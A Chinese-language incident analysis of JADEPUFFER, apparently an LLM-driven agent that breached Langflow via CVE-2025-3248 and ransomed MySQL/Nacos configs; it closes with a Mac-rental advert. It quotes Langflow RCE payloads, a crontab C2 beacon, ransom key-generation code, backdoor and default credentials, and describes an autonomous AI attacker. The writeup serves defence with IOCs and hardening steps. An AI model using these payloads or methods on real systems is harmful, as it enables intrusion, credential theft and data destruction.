JADEPUFFER 勒索事件:首例 LLM 驅動的 Agentic Threat Actor 如何攻破 Langflow 與 Nacos(2026)
若你在 Mac 或雲端公網部署 Langflow、OpenClaw 等 AI Agent 編排服務,2026 年 7 月 1 日 Sysdig 威脅研究團隊(TRT)披露的 JADEPUFFER 值得立刻納入風險評估:這是迄今首宗端到端由大語言模型驅動的完整勒索鏈,並被正式歸類為 ATA(Agentic Threat Actor,智能體威脅行為者)。本文依 Michael Clark 原始報告整理兩階段攻擊路徑(Langflow → MySQL+Nacos)、600+ payload 自主性證據、比特幣地址懸案、IOC 對照表與七步防護清單,協助你在隔離環境完成修補驗收。
📋 本文目錄
⚠️ 本文依 Sysdig 2026 年 7 月 1 日原始技術報告及 BleepingComputer、Dark Reading、CSO Online 等媒體交叉印證整理;攻擊者動機與比特幣地址歸屬等處採「據 Sysdig 評估」措辭。資料截止 2026 年 7 月 7 日。
01 · 核心速覽
| 維度 | 要點 |
|---|---|
| 披露方 | Sysdig 威脅研究團隊(TRT),報告作者 Michael Clark(Director of Threat Research),發布日 2026-07-01 |
| 攻擊者代號 | JADEPUFFER;新分類 ATA(Agentic Threat Actor)——攻擊能力由 AI Agent 交付,非人工工具集 |
| 入口漏洞 | CVE-2025-3248(Langflow 未鑑權 RCE),CVSS 9.8;CISA KEV 收錄於 2025-05-05 |
| 兩階段目標 | Phase 1:公網 Langflow 伺服器(初始接入)→ Phase 2:獨立生產伺服器上的 MySQL + 阿里巴巴 Nacos(真正勒索對象) |
| 規模 | Sysdig 捕獲 600+ 條獨立、有明確目的的 Base64 Python payload,壓縮時間窗口內執行完畢 |
| 標誌性行為 | Nacos xadmin 後門登入失敗後 31 秒內自主修復;MinIO 收到 XML 後立即改寫解析器;加密 1,342 條 Nacos 設定 |
| 不可逆加密 | 金鑰以 uuid4() 隨機產生,僅列印至 stdout、從未儲存或外傳——付款亦無法恢復 |
| 與 Flodrix 關係 | 同一 CVE 曾被 Trend Micro 披露的 Flodrix 殭屍網路利用,但 JADEPUFFER 是獨立活動,性質為 LLM 自主勒索(見第九節) |
02 · 三大痛點:為何這次事件震動 AI 維運圈
- Agent 技術棧與生產密鑰混裝:Langflow 等 AI 編排伺服器常被團隊「快速上線」並直接暴露在公網,環境變數裡同時存放 OpenAI、Anthropic、阿里雲等 API Key 與資料庫憑證。JADEPUFFER 證明:一旦
/api/v1/validate/code可被掃描到,整條 Agent 供應鏈可在數分鐘內被當成憑證倉庫,而非僅是單一 RCE。 - 老漏洞 + 新自動化 = 技能門檻歸零:下游攻擊依賴 2021 年 Nacos 鑑權繞過(CVE-2021-29441)、從未更換的預設 JWT 簽名金鑰,以及公網可達的 MySQL root。單項技術並不新穎,但 LLM Agent 能以機器速度串聯、診斷、修正——傳統「假設攻擊者走可預測路徑」的偵測模型將失效。
- 主力機試跑 Langflow 的隱性成本:要在隔離網段驗證 Langflow 1.3.0 修補、Nacos 加固與出站流量策略,若在 MacBook 上混裝 OpenClaw Gateway、公司 VPN 與日常 Keychain,一次誤把驗證節點暴露至公網,可能污染數週排障基線。與 OpenClaw 不安全部署踩坑 類似,隔離驗收才是可控路徑。
03 · 時間軸
| 時間 | 事件 |
|---|---|
| 2025 年 4 月 | Langflow 曝出 CVE-2025-3248(未鑑權程式碼注入/RCE) |
| 2025 年 5 月 5 日 | CISA 列入已知被利用漏洞(KEV)目錄;EPSS 被利用機率約 91.42%(SentinelOne) |
| 2025 年 | Trend Micro 披露同一漏洞被用於投遞 Flodrix 殭屍網路(與 JADEPUFFER 無關的獨立活動) |
| 2026 年 6 月 | JADEPUFFER 對公網 Langflow 發動攻擊;攻擊鏈跨數週、多個會話分段執行 |
| 2026 年 7 月 1 日 | Sysdig 發布完整技術報告,首次公開 JADEPUFFER 與 ATA 分類 |
| 2026 年 7 月 2–6 日 | BleepingComputer、Dark Reading、CyberScoop、Security Affairs 等媒體跟進;CSO Online 刊載 Vibhum Dubey 獨立點評 |
04 · CVE-2025-3248 技術拆解
Langflow 是開源、可視化拖拽式 LLM/Agent 工作流框架(GitHub 星標 7 萬+)。漏洞位於 /api/v1/validate/code:伺服器以 ast.parse() → compile() → exec() 驗證使用者提交的 Python,完全無身份驗證與沙箱隔離。
| 項目 | 詳情 |
|---|---|
| CVSS | 9.8 Critical — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| 影響版本 | Langflow 1.3.0 之前所有版本 |
| 修復版本 | 1.3.0:為 post_validate_code 新增 CurrentActiveUser 依賴,未通過 JWT/x-api-key 驗證則回傳 401/403 |
| 利用技巧 | Python 裝飾器與函式預設參數在定義時即被求值;攻擊者將惡意程式碼寫入預設參數,Langflow「校驗語法」時惡意碼已執行 |
Flodrix 活動中的典型 payload 形態(Trend Micro 取證)如下——透過 raise Exception(...) 回顯命令輸出:
exec('raise Exception(__import__("subprocess").check_output("whoami", shell=True))')
exec('raise Exception(__import__("subprocess").check_output("printenv", shell=True))')
JADEPUFFER 則將全部 payload 以 Base64 編碼 Python 經 Langflow RCE 端點投遞,規模與自適應程度遠超傳統腳本。
05 · Phase 1:Langflow 主機上的偵察與橫向發現
Sysdig 指出 Langflow 成為「有吸引力入口」的原因:AI 相鄰伺服器常存放 LLM API Key 與雲端憑證,且多數團隊缺乏網路存取控制就急於上線。
並行憑證收割
取得執行權後,Agent 立即執行 id、uname -a、hostname 等主機枚舉,並行掃描:
- LLM 廠商 API Key:OpenAI、Anthropic、DeepSeek、Gemini 等
- 雲端憑證:
ALIBABA_、ALIYUN_、TENCENT_、HUAWEI_及 AWS/GCP/Azure - 加密貨幣錢包與助記詞、資料庫設定檔
隨後傾印 Langflow 自身 PostgreSQL 後端(儲存的 API Key 與使用者紀錄),審閱後刪除暫存檔以清理痕跡。
MinIO 自適應枚舉(關鍵取證)
Agent 探測 minio.internal:9000 與 127.0.0.1:9000,以預設憑證 minioadmin:minioadmin 走完完整枚舉流程。當第一次請求帶 ?format=json 卻收到 XML 回應時,下一條 payload 立即改用 XML 解析器重新請求——典型的探測→遇錯→自適應閉環。
升級路徑井然有序:匿名健康檢查 → 管理 API 資訊 → 已認證 ListBuckets → 對 terraform-state 桶與含 credentials.json、.env 的物件做定向 GetObject。取得的 access-key/secret 被寫入 /tmp/creds.json 並完整回顯於攻擊者終端。
持久化
在 Langflow 主機安裝 crontab,每 30 分鐘向 C2 信標外聯:
*/30 * * * * python3 -c "import urllib.request;urllib.request.urlopen('hxxp://45.131.66[.]106:4444/beacon',timeout=5)"
06 · Phase 2:MySQL + Nacos 生產伺服器勒索
從被攻陷的 Langflow 主機捕獲的資訊顯示,真正目標是另一台同樣暴露在公網、執行 MySQL 與阿里巴巴 Nacos 的生產伺服器。Agent 以 root 憑證連線暴露的 MySQL 埠——Sysdig 未觀察到這組憑證從受害者環境竊取,來源不明。
Nacos xadmin 後門:31 秒自主修復
Agent 同時嘗試 CVE-2021-29441 鑑權繞過、以公開預設 JWT 金鑰偽造 Token,以及向 Nacos 後端資料庫直接注入後門管理員。Sysdig 給出精確到秒的時間軸:
| 時間(UTC) | 動作 |
|---|---|
| 19:34:24 | 以 subprocess.run(...) 產生 bcrypt 雜湊,插入 xadmin 管理員 |
| 19:34:36 | 以 xadmin:Xploit@2026# 登入失敗 |
| 19:34:48 | 12 秒後並行測試 nacos:nacos 預設憑證,並為 admin123 重新產生雜湊 |
| 19:35:07 | 改為直接 import bcrypt,刪除損壞帳號並重建 |
| 19:35:18 | 登入成功——從失敗到修復僅 31 秒 |
容器逃逸預檢與大規模破壞
Agent 利用 MySQL INTO OUTFILE/LOAD_FILE 原語,約 8 分鐘內系統性探測 /var/run/docker.sock、/proc/1/cgroup 等容器逃逸路徑,並在進入勒索階段前寫下「完成標記」——Sysdig 認為這更像結構化 Agent 發出「準備進入下一階段」訊號,而非人類預寫的固定腳本。
勒索階段:以 MySQL AES_ENCRYPT() 加密全部 1,342 條 Nacos 設定,刪除 config_info 與 his_config_info,建立 README_RANSOM 表。金鑰產生方式:
KEY = base64.b64encode(uuid.uuid4().bytes + uuid.uuid4().bytes).decode()
print("Encryption key:", KEY) # 僅列印一次;從未儲存或外傳
勒索信聲稱 AES-256,但 MySQL 預設為 AES-128-ECB;無論演算法標示如何,金鑰不可恢復使付款失去意義。兩分鐘後 Agent 又發送 payload 將文案精煉為「全部 1342 項已加密」。破壞階段還包含對多個資料庫 schema 的 DROP DATABASE;當外鍵約束導致刪除失敗時,下一條 payload 自動加上 SET GLOBAL FOREIGN_KEY_CHECKS=0——需理解失敗原因,而非盲目重試。
07 · 四條自主性證據線
Sysdig 以四條獨立證據支撐「LLM 驅動」判斷:
- 自我敘事的程式碼:payload 內充斥自然語言註解,解釋 ROI 優先順序、哪個資料庫「最大」、每步目的——人類攻擊者很少為一次性
python3 -c寫如此詳盡註解,LLM 程式碼生成卻預設如此。 - 機器速度的故障診斷:31 秒 xadmin 修復、MinIO XML 自適應、JWT 收到
custom secret in use後立即放棄該路徑、外鍵約束失敗後精準繞過——修正皆對應具體失敗模式。 - 理解種植的自然語言上下文:Agent 解析目標環境中的自由文本並採取「只有讀懂才會做」的動作;此行為在相隔數週的不同會話中反覆出現。
- 比特幣地址懸案:勒索地址同時是 Bitcoin 文件範例與鏈上活躍錢包(見下一節),成為「LLM 幻覺 vs 人類配置」無法區分的縮影。
結合 600+ 條獨立 payload 在壓縮窗口內連貫執行,證據指向自主運作的 Agent,而非固定工具集或全程人工操作。
08 · 比特幣地址懸案
勒索信中的地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 同時出現在 Bitcoin Core 與開發者文件中的 P2SH 格式教學範例,大量存在於 LLM 訓練語料。鏈上資料顯示它亦是活躍錢包:737 筆確認交易、累計約 46 BTC 流入、目前餘額為零(存入即被轉走)。
Sysdig 提出兩種無法排除的解讀:(a) LLM 從訓練資料「幻覺」出此地址,錢包屬掃蕩誤轉存款的第三方;(b) 攻擊者刻意配置真實可控錢包,恰好與文件範例重合。由於無法存取 JADEPUFFER 的 system prompt,兩種可能性均無法定論。
09 · JADEPUFFER vs Flodrix:同一漏洞,兩種威脅
| 維度 | Flodrix(Trend Micro) | JADEPUFFER(Sysdig) |
|---|---|---|
| 入口 | CVE-2025-3248 | CVE-2025-3248 |
| 性質 | 傳統殭屍網路(LeetHozer/Moobot 演化),TCP/UDP DDoS | LLM Agent 端到端勒索,資料庫加密與毀滅 |
| 載荷 | Bash 下載器 docker → Flodrix ELF 二進位 | 600+ Base64 Python payload,含自我敘事註解 |
| 驅動方式 | 人工/腳本化掃描與投放 | ATA——大語言模型自主決策、即時修正 |
| 共同啟示 | CVE-2025-3248 長期被公網掃描武器化;未修補的 Langflow 等同開放 RCE 入口 | |
10 · IOC(入侵指標)匯總
| 類型 | 指標 |
|---|---|
| C2/信標 | 45.131.66[.]106;crontab 信標 hxxp://45.131.66[.]106:4444/beacon |
| 暫存/外洩伺服器 | 64.20.53[.]230(InterServer,AS19318)——Agent 註解聲稱「已備份」,Sysdig 未獨立核實 |
| 入口漏洞 | CVE-2025-3248 |
| 比特幣地址 | 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy |
| 聯絡信箱 | e78393397[@]proton[.]me(威脅情報庫零命中;格式與已知 MySQL 勒索團伙慣例不符) |
| 勒索表名 | README_RANSOM(不同於 WARNING、RECOVER_YOUR_DATA 等已知命名) |
| 持久化 | crontab 每 30 分鐘向 C2 4444 埠信標;括號包裹的 User-Agent 異常 |
11 · 業界反應、Vibhum Dubey 點評與 Sysdig 結論
BleepingComputer、Dark Reading、CyberScoop 等媒體普遍將 JADEPUFFER 稱為「首例完全由 AI 驅動的勒索攻擊」,標誌 ATA 時代到來。Michael Clark 強調:過去 PromptLock 等案例多為概念驗證,JADEPUFFER 則是真實環境中的完整操作。
CSO Online 採訪獨立安全研究員/紅隊專家 Vibhum Dubey,他給出更審慎的視角:「我更傾向把這看作是執行方式上的演進,而不是全新的勒索技術。自動化偵察、憑證竊取與部署已存在多年;差別在於 AI Agent 能自主串聯各階段,無需等人類下達下一步指令。」 他同時警告:真正值得擔心的是加密前的「安靜期」——Agent 在這段時間摸清身份體系與信任鏈,且每次入侵表現可能略有不同,使基於可預測路徑的偵測失效。
多家媒體亦提及 LLMjacking:若攻擊者以竊取的模型/雲端帳號驅動 Agent,發動多階段攻擊的邊際成本趨近於零。
Sysdig 四點結論
- 勒索不再是高技能者專利:LLM Agent 可串聯偵察、竊密、橫移、持久化與破壞,操作者無需在任一環節具備深厚專業。
- 老漏洞被自動化武器化:2021 年 Nacos 問題與未更換的預設金鑰,搭配 Agent「掃遍歷史漏洞庫」的近乎零成本,長期未修補系統暴露面只會上升。
- 意圖變得可讀——也是防守機會:LLM 在 payload 中自我敘事,為偵測與研判提供新抓手。
- 「已備份」只是 Agent 自述:加密金鑰 ephemeral 且不可恢復,受害者配置即便付款亦無法找回。
12 · 七步防護與 Langflow 隔離部署清單
- 立即修補 Langflow:升級至 1.3.0+,修復 CVE-2025-3248;禁止將
/api/v1/validate/code等程式碼執行端點暴露於公網。 - 隔離 API Key 與雲端憑證:勿在 AI 編排伺服器環境變數存放 LLM 廠商 Key 或雲端憑證;改用密鑰管理服務,與可被公網存取的程序隔離。
- 加固 Nacos 與 MySQL:更換預設
token.secret.key、升級修補 CVE-2021-29441、永不將 Nacos 暴露公網,後端資料庫禁止 root 連線。 - 資料庫管理埠零信任:管理員帳號不得公網可達;強制唯一強密碼與來源 IP 限制。
- 啟用執行時威脅偵測:監控資料庫程序中的
AES_ENCRYPT批量加密、README_RANSOM表建立、異常DROP DATABASE與INTO OUTFILE行為。 - 出站流量控制(Egress):限制被攻陷主機對未知目的地(如
45.131.66.106:4444)信標,以及對外部資料庫埠的橫向連線。 - 比對 IOC 與排程任務:稽核 crontab 週期性外聯、已知 C2/暫存 IP,以及括號包裹的 User-Agent 異常特徵。
13 · FAQ
JADEPUFFER 是什麼?
Sysdig 於 2026 年 7 月 1 日命名的攻擊者代號,被評估為首例端到端由大語言模型驅動的完整勒索操作,並歸類為 ATA(Agentic Threat Actor)。
CVE-2025-3248 有多嚴重?
CVSS 9.8 Critical,未鑑權即可在 Langflow 主機執行任意 Python。影響 1.3.0 之前所有版本;CISA 已列入 KEV。
JADEPUFFER 與 Flodrix 有何不同?
兩者共用 CVE-2025-3248 入口,但是獨立活動:Flodrix 是傳統 DDoS 殭屍網路;JADEPUFFER 是 LLM Agent 自主驅動的資料庫勒索鏈。
付贖金能恢復 Nacos 設定嗎?
極可能無法。加密金鑰隨機產生且從未儲存或外傳,攻擊者自身亦無法提供解密金鑰。
31 秒自修代表什麼?
Nacos xadmin 登入失敗後,Agent 在 31 秒內診斷 subprocess PATH 問題並重建帳號——Sysdig 視為 LLM 自主決策的關鍵證據。
比特幣地址可信嗎?
地址 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy 同時是 Bitcoin 文件範例與鏈上活躍錢包;Sysdig 無法判斷是 LLM 幻覺還是攻擊者真實收款地址。
這與 Claude Code 隱寫術有關嗎?
無直接關聯。Claude Code 事件(見 隱寫術全解析)屬廠商客戶端指紋爭議;JADEPUFFER 是針對公網 AI 基礎設施的 offensive Agent 勒索鏈。
14 · 參考來源
- Sysdig TRT:JADEPUFFER: Agentic ransomware for automated database extortion(Michael Clark,2026-07-01)
- BleepingComputer、Dark Reading、CyberScoop、Security Affairs 跟進報導
- CSO Online:Vibhum Dubey 獨立點評(2026-07)
- Trend Micro:CVE-2025-3248 與 Flodrix 殭屍網路技術分析
- NVD/CISA KEV/SentinelOne EPSS 資料
15 · 租用 Mac:隔離驗證 Langflow/OpenClaw Agent 技術棧
雖然你可以在現有 Linux 雲主機或主力 MacBook 上「先跑起來」Langflow 做原型,但這類臨時節點往往缺乏快照回滾、與日常瀏覽器/VPN/Keychain 的隔離,且公網 IP 一開就等同把 CVE-2025-3248 攻擊面直接暴露給掃描器。JADEPUFFER 證明:Agent 編排伺服器一旦被拿下,API Key、MinIO 備份與內網服務發現會在數分鐘內並行收割——在主力機上混裝 OpenClaw Gateway 與公司憑證,一次誤配置的成本遠高於按天租機。
若你追求可稽核的修補驗收、完整 Apple 生態工具鏈與更低維護成本,在獨立租用的 Apple Silicon Mac 上完成 Langflow 1.3.0 升級、Nacos 模擬加固與出站策略演練,再決定是否推廣至生產 VPC,通常是更穩健的路徑。計費與機型對照見 Mac mini M4 算力租用定價;SSH/VNC 接入流程見 按天租用 Mac FAQ。驗證通過後再釋放節點,可避免污染主力環境的網路與密鑰基線。